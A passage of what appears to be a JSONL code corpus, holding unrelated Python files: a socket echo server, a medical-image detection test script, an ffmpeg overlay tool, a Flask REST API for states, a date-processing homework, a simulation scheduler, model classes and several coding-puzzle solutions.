sys\nimport socket\n# 建立一个服务端\nserver = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\nserver.bind(('192.168.31.59',33333)) #绑定要监听的端口\nserver.listen(5) #开始监听 表示可以使用五个链接排队\nwhile True:# conn就是客户端链接过来而在服务端为期生成的一个链接实例\n conn,addr = server.accept() #等待链接,多个链接的时候就会出现问题,其实返回了两个值\n print(conn,addr)\n while True:\n data = conn.recv(1024) #接收数据\n print('recive:',data.decode()) #打印接收到的数据\n conn.send(data.upper()) #然后再发送数据\n conn.close()","sub_path":"SysInfo/socketTest.py","file_name":"socketTest.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"271780659","text":"import os, sys\n\nimport torch\nimport numpy as np\nimport pickle\nimport cv2\nfrom collections import OrderedDict\n\nfrom torch.cuda.amp import autocast, GradScaler\n\nfrom tqdm import tqdm\nimport datetime\nimport torch.distributed as dist\nfrom torch.utils.data import DataLoader\nfrom torch.nn.parallel import DistributedDataParallel\nfrom torch.utils.data.distributed import DistributedSampler\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.metrics import confusion_matrix\n\nimport opts\nimport utils\nimport inputs\nimport models\nfrom metrics.metrics import evaluate\n\n# TODO: Make Inference.py for no label-case\n\n\nclass Testor(object):\n def __init__(self, cfgs):\n\n save_dict = OrderedDict()\n save_dict[\"fold\"] = cfgs[\"fold\"]\n if cfgs[\"memo\"] is not None:\n save_dict[\"memo\"] = cfgs[\"memo\"] # 1,2,3\n\n specific_dir = [\"{}-{}\".format(key, save_dict[key]) for key in save_dict.keys()]\n\n cfgs[\"save_dir\"] = os.path.join(\n cfgs[\"save_dir\"],\n cfgs[\"model\"][\"meta\"],\n cfgs[\"model\"][\"inputs\"][\"label\"],\n \"_\".join(specific_dir),\n )\n\n # cfgs[\"save_dir\"] = os.path.join(cfgs[\"save_dir\"], \"_\".join(specific_dir))\n os.makedirs(cfgs[\"save_dir\"], exist_ok=True)\n\n self.cfgs = cfgs\n self.cfgs_test = cfgs[\"model\"][\"test\"]\n\n self.tb_writer = utils.get_writer(self.cfgs)\n self.txt_logger = utils.get_logger(self.cfgs)\n\n self.txt_logger.write(\"\\n\\n----test.py----\")\n self.txt_logger.write(\"\\n{}\".format(datetime.datetime.now()))\n self.txt_logger.write(\"\\n\\nSave Directory: \\n{}\".format(self.cfgs[\"save_dir\"]))\n self.txt_logger.write(\"\\n\\nConfigs: \\n{}\\n\".format(self.cfgs))\n\n ####### MODEL\n # NOTE: No Multiple GPU Support for Test\n model = models.get_model(self.cfgs)\n self.device = torch.device(\"cuda:{}\".format(self.cfgs[\"local_rank\"]))\n self.model = model.to(self.device)\n\n def do_test(self):\n\n with open(os.path.join(self.cfgs[\"save_dir\"], \"tot_val_record.pkl\"), \"rb\") as f:\n tot_val_record = pickle.load(f)\n best_record = tot_val_record[\"best\"]\n best_epoch = best_record[\"epoch\"]\n best_model_dir = os.path.join(\n self.cfgs[\"save_dir\"], \"epoch_{}.pt\".format(best_epoch)\n )\n checkpoint = torch.load(best_model_dir)\n self.model.load_state_dict(checkpoint[\"model\"], strict=True)\n self.txt_logger.write(\"\\n Load model dir: {}\".format(best_model_dir))\n self.txt_logger.write(\n \"\\n\" + str({k: v for k, v in best_record.items() if k != \"viz\"})\n )\n\n self.test_csvs = inputs.get_dataset(self.cfgs, mode=\"test\").csv_files\n self.txt_logger.write(\"\\n\\nCSVS: \" + str(self.test_csvs))\n\n header_columns = [\"# pos\", \"# neg\", \"# lesions\", \"# tp\", \"# fp\"]\n header_columns += [\"les sens\", \"les prec\", \"les fppi\", \"les f1\"]\n header_columns += [\"img AUC\", \"img sens\", \"img spec\"]\n\n self.txt_logger.write(\"\\n\\n\")\n self.txt_logger.log_header(header_columns)\n\n for specific_csv in self.test_csvs:\n self.test_specific_csv(specific_csv)\n\n def genActivationMapGrayScale(self, output, saveimg, min_threshold=0.0001):\n dtype = np.uint8\n _, thr = cv2.threshold(output, min_threshold, 255, 0)\n thr = thr.astype(dtype)\n contours, _ = cv2.findContours(thr, cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)\n font_size = 0.0005 * (output.shape[0] + output.shape[1]) / 2\n thick_size = int(9 * font_size)\n thick_size_2 = int(thick_size / 2)\n # print(font_size, thick_size)\n for cnt in contours:\n M = cv2.moments(cnt)\n x, y, w, h = cv2.boundingRect(cnt)\n max_p = -1\n for i in range(x, x + w):\n for j in range(y, y + h):\n if max_p < output[j][i]:\n max_p = output[j][i]\n cX = int(M[\"m10\"] / (M[\"m00\"] + 1e-4))\n cY = int(M[\"m01\"] / (M[\"m00\"] + 1e-4))\n cv2.drawContours(saveimg, [cnt], 0, (255, 255, 255, 255), thick_size)\n cv2.drawContours(saveimg, [cnt], 0, (0, 0, 0, 255), thick_size_2)\n text_x = int(cX - 30 * font_size)\n text_y = int(cY + h / 2 + 45 * font_size)\n cv2.putText(\n saveimg,\n str(int(round(100 * max_p))) + \"%\",\n (text_x, text_y),\n 0,\n font_size,\n (255, 255, 255, 255),\n thick_size,\n )\n cv2.putText(\n saveimg,\n str(int(round(100 * max_p))) + \"%\",\n (text_x, text_y),\n 0,\n font_size,\n (0, 0, 0, 255),\n thick_size_2,\n )\n\n return saveimg\n\n # FIXME:\n def save_image(self, fp, img, pred, gt, wrong_type=\"fp\"):\n\n num_classes = pred.shape[0]\n pred[pred < 0.1] = 0\n gt = (gt > 0.5).astype(np.uint8) # For soft-label case\n\n csv_name = fp.split(\"png_1024/\")[1].split(\"/\")[0]\n fp = fp.split(\"png_1024/\")[1].replace(\"/\", \"-\")\n img_dir_name = \"images_\" + wrong_type\n\n if img.shape[1] != 1024:\n img = cv2.resize(img, (1024, 1024))\n pred_temp = np.zeros((num_classes, 1024, 1024))\n gt_temp = np.zeros((num_classes, 1024, 1024))\n for c in range(num_classes):\n pred_temp[c, :, :] = cv2.resize(pred[c, :, :], (1024, 1024))\n gt_temp[c, :, :] = cv2.resize(gt[c, :, :], (1024, 1024))\n pred = pred_temp\n gt = gt_temp\n\n # png_dir = os.path.join(self.cfgs[\"save_dir\"], img_dir_name, fp)\n png_dir = os.path.join(self.cfgs[\"save_dir\"], csv_name, img_dir_name, fp)\n os.makedirs(os.path.dirname(png_dir), exist_ok=True)\n\n img *= 255\n cv2.imwrite(png_dir, img)\n\n img_mod = np.dstack([img, np.ones((1024, 1024)) * 255.0])\n img_mod = img_mod.astype(np.uint8)\n\n for c in range(num_classes):\n cv2.imwrite(\n png_dir.replace(\".png\", \"_{}_gt.png\".format(c)), gt[c, :, :] * 255\n )\n\n pred_img = self.genActivationMapGrayScale(pred[c, :, :], img_mod)\n cv2.imwrite(\n png_dir.replace(\".png\", \"_{}_pred.png\".format(c)),\n pred_img,\n )\n\n def test_specific_csv(self, specific_csv):\n ####### DATA\n test_dataset = inputs.get_dataset(\n self.cfgs,\n mode=\"test\",\n specific_csv=specific_csv,\n )\n\n # csv_name = specific_csv.split(\"/\")[-1].split(\".csv\")[0]\n test_logs = [\n len(test_dataset.abnormal_meta_df),\n len(test_dataset.normal_meta_df),\n ]\n\n test_sampler = None\n self.test_loader = DataLoader(\n dataset=test_dataset,\n batch_size=self.cfgs[\"batch_size\"],\n num_workers=self.cfgs[\"num_workers\"],\n pin_memory=True,\n drop_last=False,\n collate_fn=inputs.get_collater(),\n sampler=test_sampler,\n )\n\n ####### Init test result\n nc = self.cfgs[\"model\"][\"inputs\"][\"num_classes\"]\n npth = len(self.cfgs[\"model\"][\"test\"][\"prob_ths\"])\n\n det_gt_nums_tot = 0 # np.zeros((npth, nc))\n det_tp_nums_tot = 0 # np.array([0] * nc)\n det_fp_nums_tot = 0 # np.array([0] * nc)\n det_pred_nums_tot = 0 # np.array([0] * nc)\n nums_tot = 0\n # losses_tot = 0\n\n cls_pred_tot = []\n cls_gt_tot = []\n\n self.model.eval() # batchnorm uses moving mean/variance instead of mini-batch mean/variance\n with torch.no_grad():\n for data in tqdm(self.test_loader, disable=True):\n img = data[\"img\"].permute(0, 3, 1, 2).to(self.device)\n logits = self.model(img, mode=\"test\")\n # loss = opts.calc_loss(self.cfgs, self.device, data, logit)\n\n # losses_tot += loss * len(data[\"fp\"])\n nums_tot += len(data[\"fp\"])\n\n det_anns = data[\"bbox\"].numpy()\n\n viz_bi = 0\n for bi in range(len(data[\"fp\"])):\n bi_det_preds = logits[\"preds\"][bi].detach().cpu().numpy()\n if len(bi_det_preds) == 0: # No pred bbox\n bi_det_preds = np.ones((1, 6)) * -1\n bi_cls_pred = 0\n else:\n bi_det_preds[:, -1] = 1 / (1 + np.exp(-1 * bi_det_preds[:, -1]))\n bi_cls_pred = np.max(bi_det_preds[:, -1])\n\n bi_det_ann = det_anns[bi]\n (\n bi_det_gt_num,\n bi_det_pred_num,\n bi_det_tp_num,\n bi_det_fp_num,\n ) = evaluate(self.cfgs, bi_det_preds, bi_det_ann)\n\n # FIXME: remove .item() if multi-label case\n det_gt_nums_tot += bi_det_gt_num.item()\n det_tp_nums_tot += bi_det_tp_num.item()\n # correct_nums_tot += correct_num\n det_pred_nums_tot += bi_det_pred_num.item()\n det_fp_nums_tot += bi_det_fp_num.item()\n\n cls_pred_tot.append(bi_cls_pred)\n cls_gt_tot.append(int(bi_det_ann[0][-1] + 1))\n\n # # for Visualization - abnormal\n\n do_save = True\n wrong_type = \"\"\n if self.cfgs_test[\"save_only_wrong\"]:\n if bi_det_gt_num > 0:\n if bi_det_tp_num == bi_det_gt_num:\n do_save = False\n else:\n wrong_type = \"fn\"\n\n else:\n if bi_det_fp_num == 0:\n do_save = False\n else:\n wrong_type = \"fp\"\n\n if do_save:\n nc = self.cfgs.model.inputs.num_classes\n isz = self.cfgs.model.inputs.image_size\n\n bi_det_preds_viz = logits[\"preds\"][bi].detach().cpu().numpy()\n if len(bi_det_preds_viz) != 0: # No pred bbox\n bi_det_preds_viz[:, -1] = 1 / (\n 1 + np.exp(-1 * bi_det_preds_viz[:, -1])\n )\n else:\n bi_det_preds_viz = np.ones((1, 6)) * -1\n\n bi_det_anns_viz = data[\"bbox\"][bi].detach().cpu().numpy()\n\n bi_det_preds_viz_temp = np.zeros((nc, isz, isz))\n for (x0, y0, x1, y1, c, s) in bi_det_preds_viz:\n if c == -1:\n continue\n else:\n bi_det_preds_viz_temp[\n int(c), int(y0) : int(y1), int(x0) : int(x1)\n ] = s\n\n bi_det_anns_viz_temp = np.zeros((nc, isz, isz))\n for (x0, y0, x1, y1, c) in bi_det_anns_viz:\n if c == -1:\n continue\n else:\n bi_det_anns_viz_temp[\n int(c), int(y0) : int(y1), int(x0) : int(x1)\n ] = 1\n\n self.save_image(\n data[\"fp\"][bi],\n data[\"img\"][bi].numpy(),\n bi_det_preds_viz_temp,\n bi_det_anns_viz_temp,\n wrong_type,\n )\n\n #####################################\n\n cls_pred_tot = np.array(cls_pred_tot)\n cls_gt_tot = np.array(cls_gt_tot)\n\n det_pc = det_tp_nums_tot / (det_pred_nums_tot + 1e-5)\n det_rc = det_tp_nums_tot / (det_gt_nums_tot + 1e-5)\n det_fppi = det_fp_nums_tot / nums_tot + 1e-5\n det_f1 = 2 * det_pc * det_rc / (det_pc + det_rc + 1e-5)\n\n try:\n cls_auc = roc_auc_score(cls_gt_tot, cls_pred_tot)\n except Exception as e:\n print(e)\n cls_auc = \"None\"\n\n if (cls_gt_tot == 0).all() and (cls_pred_tot == 0).all():\n cls_sens = \"None\"\n cls_spec = 1\n else:\n tn, fp, fn, tp = confusion_matrix(cls_gt_tot, cls_pred_tot > 0.5).ravel()\n cls_sens = tp / (tp + fn + 1e-5)\n cls_spec = tn / (tn + fp + 1e-5)\n\n test_logs += [str(det_gt_nums_tot), str(det_tp_nums_tot), str(det_fp_nums_tot)]\n test_logs += [det_rc, det_pc, det_fppi, det_f1]\n test_logs += [cls_auc, cls_sens, cls_spec]\n\n self.txt_logger.log_result(test_logs, txt_write=True)\n self.txt_logger.write(\"\\n\")\n","sub_path":"mkdet/scripts/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":13097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"462308127","text":"#!/usr/bin/env python\n\"\"\"\nIntroduces ffmpeg overlays\n\neg: ./013-layered.py data/cows-big.flv data/nintendo-big.mp4 data/nintendo-small.mp4 --output layered.avi\n\"\"\"\nimport argparse \t# http://docs.python.org/2/library/argparse.html#module-argparse\nimport subprocess\n\n\ndef main():\n\n\tparser = argparse.ArgumentParser(description='stacks some videos')\n\tparser.add_argument('--output', type=str, help='the output video', default='layered.avi')\n\tparser.add_argument('videos', type=str, nargs=3, help='Three videos to stack')\n\targs = parser.parse_args()\n\n\tfilters = '[0:v][1:v]overlay=20:20[firstTwo];[firstTwo][2:v]overlay=40:40;amix=inputs=3'\n\n\t#\thttp://www.ffmpeg.org/ffmpeg-filters.html#overlay-1\n\t#\tmain_w, overlay_w, main_h, overlay_h\n\tcmd = 'ffmpeg -i {0} -i {1} -i {2} -filter_complex \"{3}\" {4}'.format(args.videos[0], args.videos[1], args.videos[2], filters, args.output)\n\tsubprocess.call(cmd, shell=True)\n\n\nif __name__ == '__main__':\n\tmain()\n\n\n","sub_path":"013-layered.py","file_name":"013-layered.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"119152385","text":"import math\r\n\r\ndef counting(N):\r\n seen = [0] * 10\r\n number = 0\r\n cur = N\r\n while True:\r\n org = cur\r\n while cur > 0:\r\n digit = cur % 10\r\n if seen[digit] == 0:\r\n seen[digit] = 1\r\n number = number+1\r\n cur = cur / 10\r\n if number == 10:\r\n return org\r\n cur = org+N\r\n\r\n\r\nif __name__ == \"__main__\":\r\n input = \"A-large\"\r\n f = open(input + \".in\")\r\n output = open(input + \".out\", \"w\")\r\n cases = int(f.readline())\r\n print(cases)\r\n for i in range(cases):\r\n N = int(f.readline())\r\n if N == 0:\r\n output.write(\"Case #\" + str(i+1)+ \": INSOMNIA\\n\")\r\n else:\r\n output.write(\"Case #\" + str(i+1)+ \": \" + str(counting(N))+\"\\n\")\r\n f.close()\r\n output.close()","sub_path":"codes/CodeJamCrawler/16_0_1_neat/16_0_1_Bino_countingsheep.py","file_name":"16_0_1_Bino_countingsheep.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"147291379","text":"from pylab import *\nrcParams.update({'font.size': 48, 'text.usetex': True})\n\nf = open('DOSCAR')\nef = float(f.readlines()[5].split()[3])\nf.close()\n\ndos = genfromtxt('DOSCAR', skip_header=6)\n\nel = -10\neh = 10\n\nxh = max(dos[(dos[:,0] < eh) & (dos[:,0] > el),1])\nxh *= 1.5\n\nf=figure(figsize=(8,12))\nplot(dos[:,1],dos[:,0]-ef)\naxhline(0,color='k',linewidth=2)\naxvline(0,color='k',linewidth=1)\nylim(el, eh)\nxlim(0,xh)\nxlabel('edos')\nylabel(\"Energy (eV)\")\n#savefig('edos_mote2.png', bbox_inches='tight', dpi=200)\ntight_layout()\nshow()\n","sub_path":"electron-dos.py","file_name":"electron-dos.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"96839242","text":"#!/usr/bin/python3\n\"\"\"\nmodule to create a new view for State objects that\nhandles all default RESTFul API actions\n\n\"\"\"\n\nfrom api.v1.views import app_views\nfrom flask import Flask\nfrom flask import jsonify\nfrom models.state import State\nfrom models import storage\nfrom flask import request\nfrom flask import abort\n\n\n@app_views.route('/states', strict_slashes=False)\ndef retrive_states():\n \"\"\"Retrieves the list of all State objects\"\"\"\n obj_list = []\n obj_dict = storage.all(State)\n for value in obj_dict.values():\n obj_list.append(State.to_dict(value))\n return (jsonify(obj_list))\n\n\n@app_views.route('/states/<state_id>', strict_slashes=False)\ndef retrive_states_by_id(state_id):\n \"\"\"Retrieves a State object\"\"\"\n all_states = storage.all(State)\n for state_obj in all_states.values():\n if state_id == state_obj.id:\n return (jsonify(state_obj.to_dict()))\n abort(404)\n\n\n@app_views.route(\n '/states/<state_id>',\n strict_slashes=False,\n methods=['DELETE']\n )\ndef delete_states_by_id(state_id):\n \"\"\"Deletes a State object\"\"\"\n all_states = storage.all(State)\n for state_obj in all_states.values():\n if state_id == state_obj.id:\n state_obj.delete()\n storage.save()\n return ({}), 200\n abort(404)\n\n\n@app_views.route('/states', strict_slashes=False, methods=['POST'])\ndef create_states():\n \"\"\"Creates a State\"\"\"\n if not (request.json):\n abort(400, 'Not a JSON')\n json_data = request.get_json()\n if ('name' not in json_data.keys()):\n abort(400, 'Missing name')\n else:\n new_state = State()\n new_state.name = json_data['name']\n new_state.save()\n return (jsonify(State.to_dict(new_state)), 201)\n\n\n@app_views.route('/states/<state_id>', strict_slashes=False, methods=['PUT'])\ndef update_states(state_id):\n \"\"\"Updates a State object\"\"\"\n all_states = storage.all(State)\n for state_obj in all_states.values():\n if state_id == state_obj.id:\n if not (request.json):\n abort(400, 'Not a JSON')\n json_data = request.get_json()\n for k, v in json_data.items():\n if k in ['update_at', 'create_at', 'id']:\n continue\n else:\n setattr(state_obj, k, v)\n state_obj.save()\n return (jsonify(State.to_dict(state_obj)), 200)\n abort(404)\n","sub_path":"api/v1/views/states.py","file_name":"states.py","file_ext":"py","file_size_in_byte":2495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"464594354","text":"\nlista = [\n \"Anna\",\"Maria\",\"Krystyna\",\"Barbara\",\"Teresa\",\"Elżbieta\",\"Zofia\",\"Ewa\",\n \"Jadwiga\",\"Sylwia\",\"Halina\",\"Danuta\",\"Małgorzata\",\"Gosia\",\"Helena\",\"Grażyna\",\n \"Bożena\",\"Stanisława\",\"Jolanta\",\"Jola\",\"Urszula\",\"Wanda\",\"Ula\",\"Ala\",\n \"Alicja\",\"Dorota\",\"Agnieszka\",\"Beata\",\"Katarzyna\",\"Joanna\",\"Asia\",\"Renata\",\n \"Iwona\",\"Aleksandra\",\"Ola\",\"Genowefa\",\"Hanna\",\"Alina\",\"Józefa\",\"Monika\",\n \"Monia\",\"Marta\",\"Martyna\",\"Marzena\",\"Izabela\",\"Iza\",\"Emila\",\"Agata\",\n \"Edyta\",\"Aniela\",\"Wioletta\",\"Wiola\",\"Justyna\",\"Aga\",\"Zuzanna\",\"Zuza\",\n \"Natalia\",\"Wiktoria\",\"Karolina\",\"Róża\",\"Ilona\",\"Julia\",\"Anita\",\"Ewelina\",\n \"Magda\",\"Kamila\",\"Paulina\",\"Patrycja\",\"Eliza\",\"Michalina\",\"Adamia\",\"Janina\",\n \"Honorata\",\"Bernarda\",\"Bernadetta\",\"Faustyna\",\"Fiona\",\"Violetta\",\"Viola\",\"Kasia\",\n \"Ania\",\"Ela\",\"Irena\",\"Celina\",\"Felicja\",\"Frnciszka\",\"Olga\",\"Zosia\",\n \"Izabella\",\n]\n#zrobie to na wątkach, obiecuje\ndef correct_name(name):\n\tif name.endswith(\"a\"):\n for buff_name in lista:\n if buff_name == name:\n return True\n return False\n\telse:\n\t\treturn False","sub_path":"game/names.py","file_name":"names.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"217163673","text":"# ------------------------------------------------------------------------------\n# Project : Homework 2\n# Author : Connor Wilding\n# Date : 04/16/2019\n#\n# File : hw2.py\n# Version : 0.1\n# Description : Create a Python program that processes dates. All dates in\n# the program are represented by (Month, Day, Year) tuples,\n# each item in the tuple is an integer.\n# ------------------------------------------------------------------------------\nimport fileinput\nimport sys\nfrom calendar import monthrange\nfrom datetime import date\nfrom os import path\n\nclass BadFileFormat(Exception):\n \"\"\"Base class for exceptions in this module.\"\"\"\n pass\n\nclass EmptyFile(BadFileFormat):\n \"\"\"Raised when an empty file is being used.\"\"\"\n\n def __str__(self):\n return 'The file is empty'\n\nclass MissingInteger(BadFileFormat):\n \"\"\"Raised when a date entry is missing a value.\n\n Attributes:\n file -- Name of the file being parsed.\n line -- the line number with missing information.\n \"\"\"\n\n def __init__(self, file, line):\n self.file = file\n self.line = line\n\n def __str__(self):\n return ' Line: %s File: %s \\t Missing Value' % (self.line, self.file)\n\nclass ImproperDate(Exception):\n\n def __init__(self, date):\n self.month = date[0]\n self.day = date[1]\n self.year = date[2]\n\n def __str__(self):\n return 'invalid date: %i-%i-%i' % (self.month, self.day, self.year)\n\n\n#####################################################################\n# Reads a file (the name of the file is stored in the parameter\n# filename) consisting of dates and returns a list of date tuples.\n# Each line in the file represents a single date and consists of\n# three integers separated by spaces. The order of the items in\n# the list must match the order of the file.\n#\n# Parameters : string filename.\n# Returns : list of tuples.\n# Throws : FileNotFoundError, BadFileFormat, ImproperDate\ndef createDateList(filename) -> list:\n # Check if the file is empty.\n if not path.getsize(filename):\n raise EmptyFile()\n\n # Process file\n with fileinput.input(filename) as file:\n date_list = []\n for line in file:\n date_entry = list(map(int, line.rsplit()))\n\n # Check that each line has 3 integers\n if len(date_entry) < 3:\n raise MissingInteger(filename, fileinput.lineno())\n\n # Check date\n if date_entry[2] < 1800 or not checkDate(date_entry[2],\n date_entry[0],\n date_entry[1]):\n raise ImproperDate(date_entry)\n\n # Date checks out, add to list\n date_list.append(date_entry)\n\n return date_list\n\n#####################################################################\n# Checks date by calling datetime.date. Accounts for leap years and\n# the ensures the year is greater than 1800.\n#\n# Parameters : int year, int month, int day\n# Returns : bool\ndef checkDate(year, month, day) -> bool:\n valid_date = True\n try:\n date(year, month, day)\n except ValueError:\n valid_date = False\n\n return valid_date\n\n#####################################################################\n# genFinalDates(year)\n# Takes a year and yields the final date of each month of\n# that year. You may assume the year is 1800 or greater.\n# Iterable function.\n#\n# Parameters : int year\n# Returns : tuple representing the month, last day, and year\ndef genFinalDates(year) -> tuple:\n month = 1\n while month <= 12:\n days_in_month = (month, monthrange(year, month)[1], year)\n yield days_in_month\n month += 1\n\n# 1. Get the name of an input file from the command line.\n# Do not prompt the user for a file name.\nfileName = sys.argv[1]\ndateList = []\n\n# 2, 3\ntry:\n dateList = createDateList(fileName)\nexcept BadFileFormat as e:\n print(e.__class__.__name__ + ': ' + e.__str__())\n sys.exit(1)\nexcept ImproperDate as e:\n print(e.__class__.__name__ + ': ' + e.__str__())\n sys.exit(1)\nexcept FileNotFoundError as e:\n print(e.__class__.__name__ + ': ' + str(e))\n sys.exit(1)\n\n# 4. Using a for loop that iterates over the iterable function\n# genFinalDates that prints each date tuple. Call genFinalDates\n# with the year of the first date in dateList.\nfor date in genFinalDates(dateList[0][2]):\n print(date)\n\n# 5. Use a for loop that iterates over the iterable function\n# genFinalDates that adds up the number of days in that year.\n# Call genFinalDates with the year of the first date in\n# dateList. Print the final result (which should be 366 for\n# leap years and 365 otherwise).\nttl_days = 0\nfor date in genFinalDates(dateList[0][2]):\n ttl_days += date[1]\n\nprint(ttl_days, end='\\n\\n')\n\n# 6. Using a single call to max, find the date that occurs latest.\n# To accomplish this, you will need to set the parameters\n# appropriately - see sorted documentation.\nprint(max([m, d, y] for m, d, y in dateList))\nprint()\n# d[0]: Month, d[1]: Day, d[2]: Year\n\n# 7. Using a single call to sorted, print the dates in ascending\n# order.\nprint(sorted(dateList, key=lambda d: (d[2], d[0], d[1])))\nprint()\n\n# 8. Using a single list comprehension that uses the dates from\n# dateList, create a list that just contains the years of the\n# dates. Print list.\nlist_years = [date[2] for date in dateList]\nprint(list_years)\nprint()\n\n# 9. Create a list monthStr that contains the twelve month\n# abbreviations: [\"Jan\", \"Feb\", \"Mar\",...,\"Dec\"]\nmonthStr = ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep',\n 'Oct', 'Nov', 'Dec']\n\n# 10. Using a single list comprehension that uses the dates from\n# dateList, create a list of date strings such as \"Jul 15, 2003\".\n# You may refer to monthStr in the list comprehension.\n# Print list.\n# test = [str(monthStr[x - 1]) + ' ' + str(day) + ', ' + str(year) for x, day,\n# year in dateList]\ndate_str = ['%s %i, %i' % (monthStr[month - 1], day, year) for month, day, year\n in dateList]\nprint(date_str)\n","sub_path":"P2/hw2.py","file_name":"hw2.py","file_ext":"py","file_size_in_byte":6179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"39211697","text":"# Class that handles the scheduling of the simulation, i.e. when each model and agent step happens.\n\nimport numpy as np\nfrom tqdm import tqdm\n\n\nclass Scheduler:\n def __init__(self, grid, timestep=0, iteration_callback=None):\n \"\"\" Manages the timesteps on the circular grid\n :param grid: the Circular grid object\n :param timestep: time to wait between each step, only usefull is visualing data. Should be zero otherwise\n :param iteration_callback: Function that gets called after a completed iteration.\n \"\"\"\n\n self.grid = grid\n self.timestep = timestep\n self.iteration_callback = iteration_callback\n self.started = False\n\n self.history = []\n self.timestamp = 0\n\n def start(self, dt, t_end) -> None:\n \"\"\" \n Starts the simulation \n :param dt: Timestep size\n :param t_end: end time of the simulation\n :return: None\n \"\"\"\n print(\"Starting simulation...\")\n for t in tqdm(np.arange(0, t_end, dt)):\n self.timestamp = t\n self.grid.announce_beforestep()\n self.grid.announce_afterstep()\n self.grid.announce_step()\n self.history = np.concatenate(\n (self.history, self.get_snapshot()), axis=None\n )\n\n return\n\n def get_snapshot(self) -> np.array:\n \"\"\"\n :return: array of dictionaries with all the cell states\n \"\"\"\n data = []\n for ring in self.grid.rings:\n for cell in ring.children:\n celldata = {\n \"t\": self.timestamp,\n \"id\": cell.id,\n \"age\": cell.current_age,\n \"parent_ring\": cell.parent.id,\n \"theta1\": cell.get_theta1(),\n \"theta2\": cell.get_theta2(),\n }\n data.append(celldata)\n return np.array(data)\n\n def pause(self):\n \"\"\"\n Pauses the current simulation after finishing current iteration\n \"\"\"\n self.started = False\n\n","sub_path":"code/scheduler.py","file_name":"scheduler.py","file_ext":"py","file_size_in_byte":2077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"575112789","text":"import webbrowser\r\n\r\n\r\nclass Movie():\r\n \"\"\"A class that holds all of our movies information.\"\"\"\r\n\r\n def __init__(self, movie_title, movie_storyline, poster_image,\r\n trailer_youtube, cast, rating, release_year):\r\n self.title = movie_title\r\n self.storyline = movie_storyline\r\n self.poster_image_url = poster_image\r\n self.trailer_youtube_url = trailer_youtube\r\n self.cast = cast # Let's add more information to our\r\n self.rating = rating # movies by adding the rating of the\r\n self.released = release_year # movie and the release year.\r\n\r\n def show_trailer(self):\r\n webbrowser.open(self.trailer_youtube_url)","sub_path":"media.py","file_name":"media.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"100655989","text":"from src.utils.constants import ID, NAME, QTY, MIN_STOCK, COST, UNITS, CATEGORY\n\n\nclass Product:\n \"\"\"Concrete class for the product entity\"\"\"\n\n def __init__(self, _id, name, qty, min_stock, cost, units, category):\n self.id = _id\n self.name = name\n self.qty = qty\n self.min_stock = min_stock\n self.cost = cost\n self.units = units\n self.category = category\n\n def to_dict(self):\n \"\"\"Convert this object into a dictionary representation\"\"\"\n product = {\n ID: self.id,\n NAME: self.name,\n QTY: self.qty,\n MIN_STOCK: self.min_stock,\n COST: self.cost,\n UNITS: self.units,\n CATEGORY: self.category\n }\n return product\n\n @staticmethod\n def from_dict(data):\n \"\"\"Create an object of this type from a dictionary representation\"\"\"\n try:\n return Product(\n data[ID],\n data[NAME],\n data[QTY],\n data[MIN_STOCK],\n data[COST],\n data[UNITS],\n data[CATEGORY]\n )\n except KeyError:\n return Product(\n 0,\n data[NAME],\n data[QTY],\n data[MIN_STOCK],\n data[COST],\n data[UNITS],\n data[CATEGORY]\n )\n\n def __str__(self):\n return str(self.to_dict())\n\n def __unicode__(self):\n return str(self.to_dict())\n","sub_path":"src/models/products.py","file_name":"products.py","file_ext":"py","file_size_in_byte":1532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"47288996","text":"#\r\n# @lc app=leetcode.cn id=90 lang=python3\r\n#\r\n# [90] 子集 II\r\n#\r\n# https://leetcode-cn.com/problems/subsets-ii/description/\r\n#\r\n# algorithms\r\n# Medium (63.36%)\r\n# Likes: 630\r\n# Dislikes: 0\r\n# Total Accepted: 129K\r\n# Total Submissions: 203.5K\r\n# Testcase Example: '[1,2,2]'\r\n#\r\n# 给你一个整数数组 nums ,其中可能包含重复元素,请你返回该数组所有可能的子集(幂集)。\r\n# \r\n# 解集 不能 包含重复的子集。返回的解集中,子集可以按 任意顺序 排列。\r\n# \r\n# \r\n# \r\n# \r\n# \r\n# 示例 1:\r\n# \r\n# \r\n# 输入:nums = [1,2,2]\r\n# 输出:[[],[1],[1,2],[1,2,2],[2],[2,2]]\r\n# \r\n# \r\n# 示例 2:\r\n# \r\n# \r\n# 输入:nums = [0]\r\n# 输出:[[],[0]]\r\n# \r\n# \r\n# \r\n# \r\n# 提示:\r\n# \r\n# \r\n# 1 \r\n# -10 \r\n# \r\n# \r\n# \r\n# \r\n#\r\n\r\n# @lc code=start\r\nfrom typing import List\r\n\r\n\r\nclass Solution:\r\n def subsetsWithDup(self, nums: List[int]) -> List[List[int]]:\r\n path = []\r\n res = []\r\n # 定义dfs函数\r\n def dfs(nums, startIndex):\r\n res.append(path[:])\r\n for i in range(startIndex, len(nums)):\r\n if i > startIndex and nums[i] == nums[i-1]:\r\n continue\r\n path.append(nums[i])\r\n dfs(nums, 